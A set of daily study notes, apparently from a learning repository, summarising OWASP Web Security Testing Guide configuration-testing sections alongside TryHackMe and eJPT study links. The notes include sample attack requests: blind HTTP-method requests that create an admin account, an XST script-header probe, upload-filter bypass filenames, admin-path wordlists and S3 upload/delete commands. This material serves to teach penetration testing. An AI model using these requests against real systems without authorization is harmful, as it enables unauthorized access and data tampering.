2. Validate that no debugging code or extensions are left in the production environments.
3. Review the logging mechanisms set in place for the application.
How to Test
Black-Box Testing
Sample and Known Files and Directories
Many web servers and application servers provide, in a default installation, sample applications and files for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999-0449 (Denial of Service in IIS when the Exair sample site had been installed)
Comment Review -
It is very common for programmers to add comments when developing large web-based applications. However, comments included inline in HTML code might reveal internal information that should not be available to an attacker. Sometimes, even source code is commented out since a functionality is no longer required, but this comment is leaked out to the HTML pages returned to the users unintentionally.
System Configuration -
Various tools, documents, or checklists can be used to give IT and security professionals a detailed assessment of target systems’ conformance to various configuration baselines or benchmarks.
Gray-Box Testing
Configuration Review -
The web server or application server configuration takes an important role in protecting the contents of the site and it must be carefully reviewed in order to spot common configuration mistakes.
It is impossible to generically say how a server should be configured, however, some common guidelines should be taken into account:
1. Make sure the server software properly logs both legitimate access and errors.
2. Make sure that the server is configured to properly handle overloads and prevent Denial of Service attacks. Ensure that the server has been performance-tuned properly.
3. Never grant non-administrative identities (with the exception of NT SERVICE\WMSvc) access to applicationHost.config, redirection.config, and administration.config (either Read or Write access). This includes Network Service, IIS_IUSRS, IUSR, or any custom identity used by IIS application pools. IIS worker processes are not meant to access any of these files directly.
4. Never share out applicationHost.config, redirection.config, and administration.config on the network. When using Shared Configuration, prefer to export applicationHost.config to another location (see the section titled “Setting Permissions for Shared Configuration).
5. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. Do not store sensitive information in these files if it should be for administrator eyes only.
6. Do not grant Write access to the identity that the Web server uses to access the shared applicationHost.config. This identity should have only Read access.
Logging
Logging is an important asset of the security of an application architecture, since it can be used to detect flaws in applications (users constantly trying to retrieve a file that does not really exist) as well as sustained attacks from rogue users.
1. Do the logs contain sensitive information?
2. Are the logs stored in a dedicated server?
3. Can log usage generate a Denial of Service condition?
4. How are they rotated? Are logs kept for the sufficient time?
5. How are logs reviewed? Can administrators use these reviews to detect targeted attacks?
6. How are log backups preserved?
7. Is the data being logged data validated (min/max length, chars etc) prior to being logged?
Sensitive Information in Logs
Some applications might, for example, use GET requests to forward form data which will be seen in the server logs. This means that server logs might contain sensitive information (such as usernames as passwords, or bank account details). This sensitive information can be misused by an attacker if they obtained the logs, for example, through administrative interfaces or known web server vulnerabilities or misconfiguration (like the well-known server-status misconfiguration in Apache-based HTTP servers).
Event logs will often contain data that is useful to an attacker (information leakage) or can be used directly in exploits:
Debug information, Stack traces, Usernames, System component names, Internal IP addresses, Less sensitive personal data (e.g. email addresses, postal addresses and telephone numbers associated with named individuals), Business data
Also, in some jurisdictions, storing some sensitive information in log files, such as personal data, might oblige the enterprise to apply the data protection laws that they would apply to their back-end databases to log files too. And failure to do so, even unknowingly, might carry penalties under the data protection laws that apply.
Log Location
Typically servers will generate local logs of their actions and errors, consuming the disk of the system the server is running on. However, if the server is compromised its logs can be wiped out by the intruder to clean up all the traces of its attack and methods. If this were to happen the system administrator would have no knowledge of how the attack occurred or where the attack source was located. Actually, most attacker tool kits include a ‘‘log zapper ‘’ that is capable of cleaning up any logs that hold given information (like the IP address of the attacker) and are routinely used in attacker’s system-level root kits.
Log Storage
Logs can introduce a Denial of Service condition if they are not properly stored. Any attacker with sufficient resources could be able to produce a sufficient number of requests that would fill up the allocated space to log files, if they are not specifically prevented from doing so. However, if the server is not properly configured, the log files will be stored in the same disk partition as the one used for the operating system software or the application itself. This means that if the disk were to be filled up the operating system or the application might fail because it is unable to write on disk.
Log Rotation
Most servers (but few custom applications) will rotate logs in order to prevent them from filling up the file system they reside on. The assumption when rotating logs is that the information in them is only necessary for a limited amount of time.
This feature should be tested in order to ensure that:
1. Logs are kept for the time defined in the security policy, not more and not less.
2. Logs are compressed once rotated (this is a convenience, since it will mean that more logs will be stored for the same available disk space).
3. File system permission of rotated log files are the same (or stricter) that those of the log files itself. For example, web servers will need to write to the logs they use but they don’t actually need to write to rotated logs, which means that the permissions of the files can be changed upon rotation to prevent the web server process from modifying these.
Log Access Control
Event log information should never be visible to end users. Even web administrators should not be able to see such logs since it breaks separation of duty controls. Ensure that any access control schema that is used to protect access to raw logs and any applications providing capabilities to view or search the logs is not linked with access control schemas for other application user roles. Neither should any log data be viewable by unauthenticated users.
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 24 Task.md
================================================
🎯 Day 24 Task
✅ THM Room
https://tryhackme.com/room/vulnversity
✅ 4.2.3 Test File Extensions Handling for Sensitive Information
Test Objectives
1. Dirbust sensitive file extensions, or extensions that might contain raw data (e.g. scripts, raw data, credentials, etc.).
2. Validate that no system framework bypasses exist on the rules set.
How to Test
Forced Browsing
Submit requests with different file extensions and verify how they are handled. The verification should be on a per web directory basis. Verify directories that allow script execution. Web server directories can be identified by scanning tools which look for the presence of well-known directories. In addition, mirroring the web site structure allows the tester to reconstruct the tree of web directories served by the application.
If the web application architecture is load-balanced, it is important to assess all of the web servers. This may or may not be easy, depending on the configuration of the balancing infrastructure. In an infrastructure with redundant components there may be slight variations in the configuration of individual web or application servers. This may happen if the web architecture employs heterogeneous technologies (think of a set of IIS and Apache web servers in a load-balancing configuration, which may introduce slight asymmetric behavior between them, and possibly different vulnerabilities).
Example
The tester has identified the existence of a file named connection.inc. Trying to access it directly gives back its contents, which are:
```
<?
mysql_connect("127.0.0.1", "root", "password")
or die("Could not connect");
?>
```
The following file extensions should never be returned by a web server, since they are related to files which may contain sensitive information or to files for which there is no reason to be served.
File Upload
1. file.phtml gets processed as PHP code.
2. FILE~1.PHT is served, but not processed by the PHP ISAPI handler.
3. shell.phPWND can be uploaded.
4. SHELL~1.PHP will be expanded and returned by the OS shell, then processed by the PHP ISAPI handler.
Gray-Box Testing
Performing white-box testing against file extensions handling amounts to checking the configurations of web servers or application servers taking part in the web application architecture, and verifying how they are instructed to serve different file extensions.
If the web application relies on a load-balanced, heterogeneous infrastructure, determine whether this may introduce different behavior.
✅ Tools
HTTrack
wget
curl
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 25 Task.md
================================================
🎯 Day 25 Task
✅ THM Room
https://tryhackme.com/room/principlesofsecurity
✅ 4.2.4 Review Old Backup and Unreferenced Files for Sensitive Information
Test Objectives
Find and analyse unreferenced files that might contain sensitive information.
How to Test
Black-Box Testing
Inference from the Naming Scheme Used for Published Content
Enumerate all of the application’s pages and functionality. This can be done manually using a browser, or using an application spidering tool. Most applications use a recognizable naming scheme, and organize resources into pages and directories using words that describe their function. From the naming scheme used for published content, it is often possible to infer the name and location of unreferenced pages. For example, if a page viewuser.asp is found, then look also for edituser.asp, adduser.asp and deleteuser.asp. If a directory /app/user is found, then look also for /app/admin and /app/manager
Other Clues in Published Content
Many web applications leave clues in published content that can lead to the discovery of hidden pages and functionality. These clues often appear in the source code of HTML and JavaScript files. The source code for all published content should be manually reviewed to identify clues about other pages and functionality. For example:
Programmers’ comments and commented-out sections of source code may refer to hidden content:
```
<!-- <A HREF="uploadfile.jsp">Upload a document to the server</A> -->
<!-- Link removed while bugs in uploadfile.jsp are fixed -->
```
JavaScript may contain page links that are only rendered within the user’s GUI under certain circumstances:
```
var adminUser=false;
if (adminUser) menu.add (new menuItem ("Maintain users", "/admin/useradmin.jsp"));
```
HTML pages may contain FORMs that have been hidden by disabling the SUBMIT element:
```
<form action="forgotPassword.jsp" method="post">
<input type="hidden" name="userID" value="123">
<!-- <input type="submit" value="Forgot Password"> -->
</form>
```
Another source of clues about unreferenced directories is the /robots.txt file used to provide instructions to web robots:
```
User-agent: *
Disallow: /Admin
Disallow: /uploads
Disallow: /backup
Disallow: /~jbloggs
Disallow: /include
```
Blind Guessing
1. Identify the file extensions in use within known areas of the application (e.g. jsp, aspx, html), and use a basic wordlist appended with each of these extensions (or use a longer list of common extensions if resources permit).
2. For each file identified through other enumeration techniques, create a custom wordlist derived from that filename. Get a list of common file extensions (including ~, bak, txt, src, dev, old, inc, orig, copy, tmp, swp, etc.) and use each extension before, after, and instead of, the extension of the actual filename
Information Obtained Through Server Vulnerabilities and Misconfiguration
The most obvious way in which a misconfigured server may disclose unreferenced pages is through directory listing. Request all enumerated directories to identify any which provide a directory listing.
1. Apache ?M=D directory listing vulnerability.
3. Various IIS script source disclosure vulnerabilities.
4. IIS WebDAV directory listing vulnerabilities.
Use of Publicly Available Information
Pages that used to be referenced may still appear in the archives of Internet search engines. For example, 1998results.asp may no longer be linked from a company’s website, but may remain on the server and in search engine databases. This old script may contain vulnerabilities that could be used to compromise the entire site. The site: Google search operator may be used to run a query only against the domain of choice, such as in: site:www.example.com. Using search engines in this way has lead to a broad array of techniques which you may find useful and that are described in the Google Hacking section of this Guide. Check it to hone your testing skills via Google. Backup files are not likely to be referenced by any other files and therefore may have not been indexed by Google, but if they lie in browsable directories the search engine might know about them.
Filename Filter Bypass
Because deny list filters are based on regular expressions, one can sometimes take advantage of obscure OS filename expansion features in which work in ways the developer didn’t expect. The tester can sometimes exploit differences in ways that filenames are parsed by the application, web server, and underlying OS and it’s filename conventions.
1. Remove incompatible characters
2. Convert spaces to underscores
3. Take the first six characters of the basename
4. Add ~<digit> which is used to distinguish files with names using the same six initial characters
5. This convention changes after the first 3 cname ollisions
6. Truncate file extension to three characters
7. Make all the characters uppercase
Tools
wget
nessus
curl
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 26 Task.md
================================================
🎯 Day 26 Task
✅ THM Room
https://tryhackme.com/room/linuxfundamentalspart2
✅ 4.2.5 Enumerate Infrastructure and Application Admin Interfaces
Test Objectives
Identify hidden administrator interfaces and functionality.
How to Test
Black-Box Testing
1. Directory and file enumeration. An administrative interface may be present but not visibly available to the tester. Attempting to guess the path of the administrative interface may be as simple as requesting: /admin or /administrator etc.. or in some scenarios can be revealed within seconds using Google dorks.
2. There are many tools available to perform brute forcing of server contents, see the tools section below for more information. A tester may have to also identify the filename of the administration page. Forcibly browsing to the identified page may provide access to the interface.
3. Comments and links in source code. Many sites use common code that is loaded for all site users. By examining all source sent to the client, links to administrator functionality may be discovered and should be investigated.
4. Reviewing server and application documentation. If the application server or application is deployed in its default configuration it may be possible to access the administration interface using information described in configuration or help documentation. Default password lists should be consulted if an administrative interface is found and credentials are required.
5. Publicly available information. Many applications such as WordPress have default administrative interfaces .
6. Alternative server port. Administration interfaces may be seen on a different port on the host than the main application. For example, Apache Tomcat’s Administration interface can often be seen on port 8080.
7. Parameter tampering. A GET or POST parameter or a cookie variable may be required to enable the administrator functionality. Clues to this include the presence of hidden fields such as:
```
<input type="hidden" name="admin" value="no">
```
or in a cookie:
```
Cookie: session_cookie; useradmin=0
```
Once an administrative interface has been discovered, a combination of the above techniques may be used to attempt to bypass authentication. If this fails, the tester may wish to attempt a brute force attack. In such an instance the tester should be aware of the potential for administrative account lockout if such functionality is present.
Gray-Box Testing
Each web framework may have its own admin default pages or path. For example
WebSphere:
```
/admin
/admin-authz.xml
/admin.conf
/admin.passwd
/admin/*
/admin/logon.jsp
/admin/secure/logon.jsp
```
PHP:
```
/phpinfo
/phpmyadmin/
/phpMyAdmin/
/mysqladmin/
/MySQLadmin
/MySQLAdmin
/login.php
/logon.php
/xmlrpc.php
/dbadmin
```
FrontPage:
```
/admin.dll
/admin.exe
/administrators.pwd
/author.dll
/author.exe
/author.log
/authors.pwd
/cgi-bin
```
WebLogic:
```
/AdminCaptureRootCA
/AdminClients
/AdminConnections
/AdminEvents
/AdminJDBC
/AdminLicense
/AdminMain
/AdminProps
/AdminRealm
/AdminThreads
```
WordPress:
```
wp-admin/
wp-admin/about.php
wp-admin/admin-ajax.php
wp-admin/admin-db.php
wp-admin/admin-footer.php
wp-admin/admin-functions.php
wp-admin/admin-header.php
```
Tools
1. BurpSuite/ZAP
3. https://github.com/vanhauser-thc/thc-hydra
Default-Wordlist :- https://cirt.net/passwords
Logins.txt :- https://github.com/fuzzdb-project/fuzzdb/blob/master/discovery/predictable-filepaths/login-file-locations/Logins.txt
Common admin/debugging parameters :- https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/business-logic/CommonDebugParamNames.txt
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 27 Task.md
================================================
🎯 Day 27 Task
✅ THM Room
https://tryhackme.com/room/activerecon
✅ Web App Pentesting - HTTP Headers & Methods Video by
https://youtu.be/8q5mc1AEtYo
✅ 4.2.6 Test HTTP Methods
Test Objectives
1. Enumerate supported HTTP methods.
2. Test for access control bypass.
3. Test XST vulnerabilities.
4. Test HTTP method overriding techniques.
How to Test
Discover the Supported Methods
To perform this test, the tester needs some way to figure out which HTTP methods are supported by the web server that is being examined. While the OPTIONS HTTP method provides a direct way to do that, verify the server’s response by issuing requests using different methods. This can be achieved by manual testing or something like the http-methods Nmap script.
To use the http-methods Nmap script to test the endpoint /index.php on the server localhost using HTTPS, issue the command:
```
nmap -p 443 --script http-methods --script-args http-methods.url-path='/index.php' localhost
```
Testing the PUT Method
1. Capture the base request of the target with a web proxy.
2. Change the request method to PUT and add test.html file and send the request to the application server.
```
PUT /test.html HTTP/1.1
Host: testing-website
<html>
HTTP PUT Method is Enabled
</html>
```
3. If the server response with 2XX success codes or 3XX redirections and then confirm by GET request for test.html file. The application is vulnerable.
Testing for Access Control Bypass
Find a page to visit that has a security constraint such that a GET request would normally force a 302 redirect to a log in page or force a log in directly. Issue requests using various methods such as HEAD, POST, PUT etc. as well as arbitrarily made up methods such as BILBAO, FOOBAR, CATS, etc. If the web application responds with a HTTP/1.1 200 OK that is not a log in page, it may be possible to bypass authentication or authorization
```
$ ncat www.example.com 80
HEAD /admin HTTP/1.1
Host: www.example.com
HTTP/1.1 200 OK
Date: Mon, 18 Aug 2008 22:44:11 GMT
Server: Apache
Set-Cookie: PHPSESSID=pKi...; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: adminOnlyCookie1=...; expires=Tue, 18-Aug-2009 22:44:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie2=...; expires=Mon, 18-Aug-2008 22:54:31 GMT; domain=www.example.com
Set-Cookie: adminOnlyCookie3=...; expires=Sun, 19-Aug-2007 22:44:30 GMT; domain=www.example.com
Content-Language: EN
Connection: close
Content-Type: text/html; charset=ISO-8859-1
```
If the system appears vulnerable, issue CSRF-like attacks such as the following to exploit the issue more fully:
```
HEAD /admin/createUser.php?member=myAdmin
```
```
PUT /admin/changePw.php?member=myAdmin&passwd=foo123&confirm=foo123
```
```
CATS /admin/groupEdit.php?group=Admins&member=myAdmin&action=add
```
Using the above three commands, modified to suit the application under test and testing requirements, a new user would be created, a password assigned, and the user made an administrator, all using blind request submission
Testing for Cross-Site Tracing Potential
Note: in order to understand the logic and the goals of a cross-site tracing (XST) attack, one must be familiar with cross-site scripting attacks.
The TRACE method, intended for testing and debugging, instructs the web server to reflect the received message back to the client. This method, while apparently harmless, can be successfully leveraged in some scenarios to steal legitimate users’ credentials. This attack technique was discovered by Jeremiah Grossman in 2003, in an attempt to bypass the HttpOnly attribute that aims to protect cookies from being accessed by JavaScript. However, the TRACE method can be used to bypass this protection and access the cookie even when this attribute is set.
Test for cross-site tracing potential by issuing a request such as the following:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Random: Header
HTTP/1.1 200 OK
Random: Header
...
```
The web server returned a 200 and reflected the random header that was set in place. To further exploit this issue:
```
$ ncat www.victim.com 80
TRACE / HTTP/1.1
Host: www.victim.com
Attack: <script>prompt()</script>
```
The above example works if the response is being reflected in the HTML context.
Testing for HTTP Method Overriding
Some web frameworks provide a way to override the actual HTTP method in the request by emulating the missing HTTP verbs passing some custom header in the requests. The main purpose of this is to circumvent some middleware (e.g. proxy, firewall) limitation where methods allowed usually do not encompass verbs such as PUT or DELETE. The following alternative headers could be used to do such verb tunneling:
**X-HTTP-Method**
**X-HTTP-Method-Override**
**X-Method-Override**
In order to test this, in the scenarios where restricted verbs such as PUT or DELETE return a “405 Method not allowed”, replay the same request with the addition of the alternative headers for HTTP method overriding, and observe how the system responds. The application should respond with a different status code (e.g. 200) in cases where method overriding is supported.
The web server in the following example does not allow the DELETE method and blocks it:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com
HTTP/1.1 405 Method Not Allowed
Date: Sat, 04 Apr 2020 18:26:53 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS
Content-Length: 320
Content-Type: text/html; charset=iso-8859-1
Vary: Accept-Encoding
```
After adding the X-HTTP-Method header, the server responds to the request with a 200:
```
$ ncat www.example.com 80
DELETE /resource.html HTTP/1.1
Host: www.example.com
X-HTTP-Method: DELETE
HTTP/1.1 200 OK
Date: Sat, 04 Apr 2020 19:26:01 GMT
Server: Apache
```
Tools
1. Netcat
2. cURL
3. BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 28 Task.md
================================================
🎯 Day 28 Task
✅ THM Room
https://tryhackme.com/room/walkinganapplication
✅ 4.2.7 Test HTTP Strict Transport Security (HSTS)
The HTTP Strict Transport Security (HSTS) feature lets a web application inform the browser through the use of a special response header that it should never establish a connection to the specified domain servers using un-encrypted HTTP. Instead, it should automatically establish all connection requests to access the site through HTTPS. It also prevents users from overriding certificate errors.
The HTTP strict transport security header uses two directives:
1. **max-age**: to indicate the number of seconds that the browser should automatically convert all HTTP requests to HTTPS.
2. **includeSubDomains**: to indicate that all related sub-domains must use HTTPS.
3. **preload Unofficial**: to indicate that the domain(s) are on the preload list(s) and that browsers should never connect without HTTPS.
Here’s an example of the HSTS header implementation:
```
Strict-Transport-Security: max-age=31536000; includeSubDomains
```
The use of this header by web applications must be checked to find if the following security issues could be produced:
1. Attackers sniffing the network traffic and accessing the information transferred through an un-encrypted channel.
2. Attackers exploiting a manipulator in the middle attack because of the problem of accepting certificates that are not trusted.
3. Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated use of the HTTP protocol.
Test Objectives
Review the HSTS header and its validity.
How to Test
The presence of the HSTS header can be confirmed by examining the server’s response through an intercepting proxy or by using curl as follows:
```
curl -s -D- https://owasp.org | grep -i strict
Strict-Transport-Security: max-age=31536000
```
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 29 Task.md
================================================
🎯 Day 29 Task
✅ THM Room
https://tryhackme.com/room/sqlinjectionlm
✅ 4.2.8 Test RIA Cross Domain Policy
Test Objectives - Review and validate the policy files.
What are cross-domain policy files?
A cross-domain policy file specifies the permissions that a web client such as Java, Adobe Flash, Adobe Reader, etc. use to access data across different domains. For Silverlight, Microsoft adopted a subset of the Adobe’s crossdomain.xml, and additionally created it’s own cross-domain policy file: clientaccesspolicy.xml.
Whenever a web client detects that a resource has to be requested from other domain, it will first look for a policy file in the target domain to determine if performing cross-domain requests, including headers, and socket-based connections are allowed.
**Crossdomain.xml** vs. **Clientaccesspolicy.xml**
Most RIA applications support crossdomain.xml. However in the case of Silverlight, it will only work if the crossdomain.xml specifies that access is allowed from any domain. For more granular control with Silverlight, clientaccesspolicy.xml must be used.
Policy files grant several types of permissions:
1. Accepted policy files (Master policy files can disable or restrict specific policy files)
2. Sockets permissions
3. Header permissions
4. HTTP/HTTPS access permissions
5. Allowing access based on cryptographic credentials
An example of an overly permissive policy file:
```
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="false"/>
</cross-domain-policy>
```
How can cross domain policy files can be abused?
Overly permissive cross-domain policies.
Generating server responses that may be treated as cross-domain policy files.
Using file upload functionality to upload files that may be treated as cross-domain policy files.
Impact of Abusing Cross-Domain Access
1. Defeat CSRF protections.
2. Read data restricted or otherwise protected by cross-origin policies.
How to Test - Testing for RIA Policy Files Weakness
To test for RIA policy file weakness the tester should try to retrieve the policy files crossdomain.xml and clientaccesspolicy.xml from the application’s root, and from every folder found.
For example, if the application’s URL is http://www.owasp.org, the tester should try to download the files http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml.
For example, if the application’s URL is http://www.owasp.org, the tester should try to download the files http://www.owasp.org/crossdomain.xml and http://www.owasp.org/clientaccesspolicy.xml.
After retrieving all the policy files, the permissions allowed should be be checked under the least privilege principle. Requests should only come from the domains, ports, or protocols that are necessary. Overly permissive policies should be avoided. Policies with * in them should be closely examined.
Example
```
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
```
Result Expected
1. A list of policy files found.
2. A list of weak settings in the policies.
✅ Tools - Nikto, BurpSuite/ZAP
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 30 Task.md
================================================
🎯 Day 30 Task
✅ THM Room
https://tryhackme.com/room/windowsfundamentals2x0x
✅ 4.2.9 Test File Permission
Test Objectives - Review and identify any rogue file permissions.
How to Test
In Linux, use ls command to check the file permissions. Alternatively, namei can also be used to recursively list file permissions.
```
namei -l /PathToCheck/
```
The files and directories that require file permission testing include but are not limited to:
1. Web files/directory
2. Configuration files/directory
3. Sensitive files (encrypted data, password, key)/directory
4. Log files (security logs, operation logs, admin logs)/directory
5. Executables (scripts, EXE, JAR, class, PHP, ASP)/directory
6. Database files/directory
7. Temp files /directory
8. Upload files/directory
Remediation
Set the permissions of the files and directories properly so that unauthorized users cannot access critical resources unnecessarily.
Tools - https://linux.die.net/man/1/namei
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 31 Task.md
================================================
🎯 Day 31 Task
✅ THM Room
https://tryhackme.com/room/burpsuitebasics
✅ 4.2.10 Test for Subdomain Takeover
✅ https://0xpatrik.com/subdomain-takeover-basics/
Test Objectives
1. Enumerate all possible domains (previous and current).
2. Identify forgotten or misconfigured domains.
How to Test
Black-Box Testing
The first step is to enumerate the victim DNS servers and resource records. There are multiple ways to accomplish this task, for example DNS enumeration using a list of common subdomains dictionary, DNS brute force or using web search engines and other OSINT data sources.
Using the dig command the tester looks for the following DNS server response messages that warrant further investigation:
**NXDOMAIN**
**SERVFAIL**
**REFUSED**
**no servers could be reached.
**
Testing DNS A, CNAME Record Subdomain Takeover
Perform a basic DNS enumeration on the victim’s domain (victim.com) using dnsrecon:
```
$ ./dnsrecon.py -d victim.com
[*] Performing General Enumeration of Domain: victim.com
...
[-] DNSSEC is not configured for victim.com
[*] A subdomain.victim.com 192.30.252.153
[*] CNAME subdomain1.victim.com fictioussubdomain.victim.com
...
```
Identify which DNS resource records are dead and point to inactive/not-used services. Using the dig command for the CNAME record:
```
$ dig CNAME fictioussubdomain.victim.com
; <<>> DiG 9.10.3-P4-Ubuntu <<>> ns victim.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 42950
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
```
The following DNS responses warrant further investigation: NXDOMAIN.
To test the A record the tester performs a whois database lookup and identifies GitHub as the service provider:
```
$ whois 192.30.252.153 | grep "OrgName"
OrgName: GitHub, Inc.
```
The tester visits subdomain.victim.com or issues a HTTP GET request which returns a “404 - File not found” response which is a clear indication of the vulnerability.
Testing NS Record Subdomain Takeover
Identify all nameservers for the domain in scope:
```
$ dig ns victim.com +short
ns1.victim.com
nameserver.expireddomain.com
```
In this fictious example the tester checks if the domain expireddomain.com is active with a domain registrar search. If the domain is available for purchase the subdomain is vulnerable.
The following DNS responses warrant further investigation: SERVFAIL or REFUSED.
Gray-Box Testing
The tester has the DNS zone file available which means DNS enumeration is not necessary. The testing methodology is the same.
Tools -
Subdomain Enum Tools - Amass, Subfinder, Assetfinder
dig
dnsrecon
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 32 Task.md
================================================
🎯 Day 32 Task
✅ THM Room
https://tryhackme.com/room/burpsuiterepeater
-----------------------------------------------------------------------------------------------------------------------------------------------
eJPT Journey (with consistency)
🎯 eJPT Day 1
🔃 Introduction (1-3)
1. The Information Security Field - Study Guide
3. Cryptography & VPNs - Study Guide
3. Wireshark Introduction - Study Guide
Wireshark Additional Resources
Cheat Sheets : - https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
Hindi - Youtube : - https://youtu.be/a-Fg7VVDf14
English - Youtube : - https://youtu.be/4_7A8Ikp5Cc
**Note:- eJPT Material are very good for cracking the eJPT exam but I share some additional resource for learning !!!**
----------------------------------------------------------------------------------------------------------------------------------------------
✅ 4.2.11 Test Cloud Storage
Test Objectives - Assess that the access control configuration for the storage services is properly in place.
How to Test
First identify the URL to access the data in the storage service, and then consider the following tests:
**read the unauthorized data**
**upload a new arbitrary file**
You may use curl for the tests with the following commands and see if unauthorized actions can be performed successfully.
To test the ability to read an object:
```
curl -X GET https://<cloud-storage-service>/<object>
```
To test the ability to upload a file:
```
curl -X PUT -d 'test' 'https://<cloud-storage-service>/test.txt'
```
Testing for Amazon S3 Bucket Misconfiguration
The Amazon S3 bucket URLs follow one of two formats, either virtual host style or path-style.
**Virtual Hosted Style Access**
```
https://bucket-name.s3.Region.amazonaws.com/key-name
```
In the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:
```
https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png
```
**Path-Style Access**
```
https://s3.Region.amazonaws.com/bucket-name/key-name
```
As above, in the following example, my-bucket is the bucket name, us-west-2 is the region, and puppy.png is the key-name:
```
https://s3.us-west-2.amazonaws.com/my-bucket/puppy.jpg
```
For some regions, the legacy global endpoint that does not specify a region-specific endpoint can be used. Its format is also either virtual hosted style or path-style.
**Virtual Hosted Style Access**
```
https://bucket-name.s3.amazonaws.com
```
**Path-Style Access**
```
https://s3.amazonaws.com/bucket-name
```
**Identify Bucket URL**
For black-box testing, S3 URLs can be found in the HTTP messages. The following example shows a bucket URL is sent in the img tag in a HTTP response.
```
...
<img src="https://my-bucket.s3.us-west-2.amazonaws.com/puppy.png">
...
```
**Testing with AWS-CLI**
In addition to testing with curl, you can also test with the AWS Command-line tool. In this case s3:// protocol is used.
**List**
The following command lists all the objects of the bucket when it is configured public.
```
aws s3 ls s3://<bucket-name>
```
**Upload**
The following is the command to upload a file
```
aws s3 cp arbitrary-file s3://bucket-name/path-to-save
```
This example shows the result when the upload has been successful.
```
aws s3 cp test.txt s3://bucket-name/test.txt
upload: ./test.txt to s3://bucket-name/test.txt
```
This example shows the result when the upload has failed.
```
aws s3 cp test.txt s3://bucket-name/test.txt
upload failed: ./test2.txt to s3://bucket-name/test2.txt An error occurred (AccessDenied) when calling the PutObject operation: Access Denied
```
**Remove**
The following is the command to remove an object
```
aws s3 rm s3://bucket-name/object-to-remove
```
**Tools**
AWS CLI - https://aws.amazon.com/cli/
Note - I am making notes from Official OWASP Website you can check it from here
https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/
I am just Sharing what I learn for help Other's !!!
#infosec #learn365 #owasp
================================================
FILE: Resources/Day 33 Task.md
================================================
🎯 Day 33 Task
✅ THM Room
https://tryhackme.com/room/picklerick
-------------------------------------------------------------------------------------------------------------------------
✅ eJPT
✅ Introduction (4-7)
4. HTTP(s) Traffic Sniffing
5. Connecting to your first lab
6. HTTP(S) Traffic Sniffing
7. Binary Arithmetic Basics - Study Guide
Binary Arithmetic Calculator
https://www.rapidtables.com/convert/number/
**Note:- eJPT Material are very good for cracking the eJPT exam but I share some additional resource for learning !!!**
-------------------------------------------------------------------------------------------------------------------------
✅ 4.2.12 Test for Content Security Policy
Test Objectives - Review the Content-Security-Policy header or meta element to identify misconfigurations.
How to Test
To test for misconfigurations in CSPs, look for insecure configurations by examining the Content-Security-Policy HTTP response header or CSP meta element in a proxy tool:
1. unsafe-inline directive enables inline scripts or styles making the applications susceptible to XSS attacks.
2. unsafe-eval directive allows eval() to be used in the application.
3. Resources such as scripts can be allowed to be loaded from any origin by the use wildcard (*) source.
a. Also consider wildcards based on partial matches, such as: https://* or *.cdn.com.
b. Consider whether allow listed sources provide JSONP endpoints which might be used to bypass CSP or same-origin-policy.
